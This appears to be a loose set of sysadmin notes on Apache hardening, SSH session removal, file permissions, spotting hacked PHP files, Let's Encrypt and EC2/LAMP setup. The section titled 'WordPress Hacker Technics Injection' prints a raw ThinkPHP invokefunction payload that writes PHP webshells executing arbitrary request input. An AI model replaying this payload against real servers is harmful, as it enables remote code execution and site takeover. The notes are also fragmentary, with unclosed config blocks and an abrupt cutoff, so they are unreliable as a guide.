Stopping “connect” attacks in apache (solution)

Then add the following right after it and restart apache to activate.

# Second, we configure the "default" Location to restrict the methods
# to stop CONNECT method attacks.
Order allow,deny Deny from all

I don’t like the idea of my server responding to requests for random hostnames, even if it serves local content. How can I deny these requests?

<VirtualHost *:80>
  ServerName default.only
  <Location />
    Order allow,deny
    Deny from all

How to kickout illegal ssh user from your unix server ?

Type who the -u flag; the PID is the number off to the right:

> who -u
ec2-user pts/1        2019-11-14 16:52 00:02   16035 (
Look up the process ID of the shell their TTY is connected to: 
> ps t   PID   TTY      STAT   TIME COMMAND   16035 pts/1    Ss     0:00 zsh 

Laugh at their impending disconnection (this step is optional, but encouraged) 
> echo "HAHAHAHAHAHAHAHA" | write ec2-user pts/1 

Kill the corresponding process: > kill -9 16035 

WordPress Hacker Technics Injection\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=atpko.php&vars[1][]=<?php mb_ereg_replace('.',@$_REQUEST[_], '', 'e');\think\template\driver\file/write&cacheFile=kolsk.php&content=<?php mb_ereg_replace('.',@$_REQUEST[_], '', 'e');\think\template\driver\file/write&cacheFile=kolsk.php&content=

Files Permission – Unix Server

  • Folders – 755
  • Files – 644
  • wp-config.php – 600
  • .htaccess – 644, or 600

Unix command for directories 755

find . -type d -print0 | xargs -0 chmod 0755
sudo find . -type d -print0 | sudo xargs -0 chmod 0755

Unix command for files 644

find . -type f -print0 | xargs -0 chmod 0644
sudo find . -type f -print0 | sudo xargs -0 chmod 0644

Find hacked files

grep -r --include=*.php -e '[[:alnum:]\/\+]\{137,\}'

How to SSL Apache Web Server configuration ?

Refer to

Free SSL – Let’s encrypt


  sudo mv certbot-auto /usr/local/bin/certbot-auto
  sudo chown root /usr/local/bin/certbot-auto
  chmod 0755 /usr/local/bin/certbot-auto
  sudo /usr/local/bin/certbot-auto --apache

(1) modify –> /etc/httpd/conf.d/ssl.conf

(2) make sure you close http via aws inbount and ACL


  sudo /usr/local/bin/certbot-auto --apache

Activate htaccess

<Directory /var/www/xxxx>
    Options Indexes FollowSymLinks MultiViews
    AllowOverride All
    Require all granted

Proper Directory and file permission

Directories 775
Files 664

Unix command for directories 755

find . -type d -print0 | xargs -0 chmod 0755
sudo find . -type d -print0 | sudo xargs -0 chmod 0755

Unix command for files 644

find . -type f -print0 | xargs -0 chmod 0644
sudo find . -type f -print0 | sudo xargs -0 chmod 0644

Unix User Apache

sudo chown -R apache:apache .

Find hacked files

grep -r --include=*.php -e '[[:alnum:]\/\+]\{137,\}'

Create instance ec2 with ssh access

(1) create ec2 instance

(2) create vpc Make usre to have public IPV4 dns

Get your VPC ID from your EC2 dashboard.
Go to VPC dashboard. Select your VPC with VPC ID.
Click on Actions and Select "Edit DNS Hostnames".
Select Yes and click Save.

Now you can find Public DNS IPv4 value in EC2 dashboard.

(3) create subnet – 250 available ip addresses make sure auto-assign IPV 4

(4) create internet gateway

(5) create route tables – ADD to internet gateway

Install without verification

yum update -y

apache web server

    <VirtualHost *:80>
      DocumentRoot "/www/docs/"
      ServerName ec2-3-88-63-157.compute-1.amazonaws.comm
      ErrorLog "logs/"
      TransferLog "logs/"



user@webserver:~$ wget
user@webserver:~$ sudo mv certbot-auto /usr/local/bin/certbot-auto
user@webserver:~$ sudo chown root /usr/local/bin/certbot-auto
user@webserver:~$ chmod 0755 /usr/local/bin/certbot-auto
user@webserver:~$ /usr/local/bin/certbot-auto --help

/usr/local/bin/certbot-auto --debug --apache certonly -d

Install new php package

sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 php7.2
sudo amazon-linux-extras enable php7.3
sudo yum -y install php-cli php-pdo php-fpm php-json php-mysqlnd

Start the Apache web server.

[ec2-user ~]$ sudo systemctl start httpd

Use the systemctl command to configure the Apache web server to start at each system boot.

[ec2-user ~]$ sudo systemctl enable httpd

You can verify that httpd is on by running the following command:

[ec2-user ~]$ sudo systemctl is-enabled httpd

To ensure that all of your software packages are up to date, perform a quick software update on your instance. This process may take a few minutes, but it is important to make sure that you have the latest security updates and bug fixes.

The -y option installs the updates without asking for confirmation. If you would like to examine the updates before installing, you can omit this option.

[ec2-user ~]

$ sudo yum update -y Install the lamp-mariadb10.2-php7.2 and php7.2 Amazon Linux Extras repositories to get the latest versions of the LAMP MariaDB and PHP packages for Amazon Linux 2.

[ec2-user ~]

$ sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 p